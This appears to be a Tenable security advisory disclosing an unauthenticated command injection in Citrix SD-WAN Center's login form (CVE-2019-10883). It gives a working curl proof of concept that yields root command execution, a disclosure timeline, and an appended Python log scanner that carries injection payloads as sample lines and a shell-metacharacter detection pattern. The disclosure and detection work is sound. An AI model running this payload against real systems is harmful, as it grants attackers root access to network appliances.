### Synopsis

While developing a Nessus plugin for CVE-2017-6316, Tenable found an unauthenticated remote operating system command injection vulnerability in Citrix SD-WAN Center 10.2.0.136.733315.

The vulnerability appears to be in /home/talariuser/www/app/Controller/UsersController.php. The controller has insufficient validation of user-supplied data ($username). An unauthenticated remote attacker can use the following curl command to run arbitrary OS commands on the remote host:

```
curl -skv --tlsv1.2 -d '_method=POST&data%5BUser%5D%5Busername%5D=%60sudo%20id%20>/tmp/test%60&data%5BUser%5D%5Bpassword%5D=my_password&data%5BUser%5D%5BsecPassword%5D=my_secPassword' 'https://[target_host]/login'
```

With command output:

```
root@VWC:/home/talariuser/www/app/Controller# cat /tmp/test
uid=0(root) gid=0(root) groups=0(root)
```

### Solution

Upgrade NetScaler SD-WAN Center to 10.0.7 or newer. Upgrade Citrix SD-WAN Center to 10.2.1 or newer. Follow Citrix's security best practices to further enhance your security posture.

### Additional References

https://support.citrix.com/article/CTX247737

### Disclosure Timeline

* 01/28/19 – Vulnerability discovered.
* 02/07/19 – Tenable reported to firstname.lastname@example.org via encrypted email. 90 days is May 9th.
* 02/08/19 – Citrix acknowledges and asks for Tenable's public key.
* 02/08/19 – Tenable sends a public key.
* 02/26/19 – Citrix acknowledges they've reproduced the vulnerability.
* 02/26/19 – Tenable thanks Citrix.
* 04/03/19 – Tenable asks Citrix for an update.
* 04/04/19 – Citrix indicates they are getting a CVE assigned and a bulletin ready. Asks Tenable who to credit.
* 04/04/19 – Tenable says "Tenable, Inc." and offers to assign the CVE.
* 04/08/19 – Citrix indicates April 10th is the disclosure date and notes they already have a CVE allocated.
* 04/08/19 – Tenable asks for a copy of the draft bulletin or CVE assignment.
* 04/08/19 – Citrix assigned CVE-2019-10883. Can't share bulletin.
* 04/08/19 – Tenable thanks Citrix.
* 04/10/19 – Citrix notifies Tenable of publication and thanks Tenable.
* 04/10/19 – Tenable thanks Citrix.
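As an added detection example (not part of the Tenable advisory or the Citrix code base), the script below scans request logs for the injection pattern described in the Synopsis: a POST to /login whose data[User][username] field carries shell metacharacters such as backticks or $( ). It assumes a reverse proxy or WAF log that records the URL-encoded POST body in a "<ip> <method> <path> <body>" layout; the log lines are constructed.

```python
# Added example, not from the advisory: flag POST /login requests whose
# data[User][username] value contains shell metacharacters (the CVE-2019-10883
# pattern). Assumes a proxy/WAF log that captures the raw POST body, which
# ordinary web-server access logs do not.
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# Metacharacters that have no business in a login name: backtick, $, ;, |, &,
# newline, and the $( form of command substitution.
SHELL_META = re.compile(r"[`$;|&\n]|\$\(")


def suspicious_username(body: str) -> Optional[str]:
    """Return the offending username from a URL-encoded login body, or None."""
    fields = parse_qs(body, keep_blank_values=True)  # decodes %5B/%5D/%60 etc.
    for name in fields.get("data[User][username]", []):
        if SHELL_META.search(name):
            return name
    return None


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_no, username) for POST /login entries carrying shell metacharacters."""
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split(" ", 3)  # "<ip> <method> <path> <raw-body>"
        if len(parts) < 4:
            continue
        _ip, method, path, body = parts
        if method != "POST" or path.split("?")[0] != "/login":
            continue
        name = suspicious_username(body)
        if name is not None:
            hits.append((n, name))
    return hits


# Constructed sample log lines (hypothetical proxy log layout).
SAMPLE_LOG = [
    "10.0.0.5 POST /login _method=POST&data%5BUser%5D%5Busername%5D=alice&data%5BUser%5D%5Bpassword%5D=pw",
    "10.0.0.9 POST /login _method=POST&data%5BUser%5D%5Busername%5D=%60sudo%20id%20>/tmp/test%60&data%5BUser%5D%5Bpassword%5D=x",
    "10.0.0.7 GET /login -",
    "10.0.0.8 POST /login _method=POST&data%5BUser%5D%5Busername%5D=%24(id)&data%5BUser%5D%5Bpassword%5D=x",
]

if __name__ == "__main__":
    for n, name in scan_log(SAMPLE_LOG):
        print(f"line {n}: shell metacharacters in username {name!r}")
```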